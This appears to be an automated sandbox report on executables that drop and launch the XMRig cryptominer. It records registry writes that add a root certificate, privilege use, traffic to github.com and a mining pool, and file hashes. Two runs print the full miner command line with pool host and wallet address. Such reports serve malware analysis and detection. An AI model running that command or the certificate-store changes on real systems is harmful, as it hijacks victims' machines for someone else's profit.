Max time kernel

1621s

Max time network

1634s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-14 05:12

Reported

2024-06-14 06:33

Platform

win10v2004-20240611-en

Max time kernel

1792s

Max time network

1800s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 35.15.31.184.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 170.117.168.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/664-14-0x000001A5C7E60000-0x000001A5C7E80000-memory.dmp

memory/664-15-0x000001A5C9950000-0x000001A5C9970000-memory.dmp

memory/664-16-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-18-0x000001A5C9990000-0x000001A5C99B0000-memory.dmp

memory/664-17-0x000001A5C9970000-0x000001A5C9990000-memory.dmp

memory/664-19-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-20-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-23-0x000001A5C9990000-0x000001A5C99B0000-memory.dmp

memory/664-22-0x000001A5C9970000-0x000001A5C9990000-memory.dmp

memory/664-21-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-24-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-25-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-26-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-27-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-28-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-29-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-30-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-31-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-32-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-33-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-34-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-35-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-36-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-37-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-38-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-39-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-40-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-41-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-42-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-43-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-44-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-45-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-46-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-47-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-48-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-49-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-50-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-51-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-52-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-53-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-54-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-55-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-56-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-57-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-58-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-59-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-60-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-61-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-62-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-63-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-64-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-65-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-66-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-67-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-68-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-69-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-70-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-71-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-72-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-73-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-74-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-75-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-76-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-77-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-78-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-79-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-80-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-81-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

memory/664-82-0x00007FF7D5820000-0x00007FF7D6323000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-14 05:12

Reported

2024-06-14 06:33

Platform

win10v2004-20240611-en

Max time kernel

1792s

Max time network

1796s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 57.15.31.184.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 123.10.44.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/2964-14-0x0000024933FA0000-0x0000024933FC0000-memory.dmp

memory/2964-15-0x0000024933FE0000-0x0000024934000000-memory.dmp

memory/2964-16-0x00007FF7CF210000-0x00007FF7CFD13000-memory.dmp

memory/2964-17-0x00000249357C0000-0x00000249357E0000-memory.dmp

memory/2964-18-0x00000249357E0000-0x0000024935800000-memory.dmp

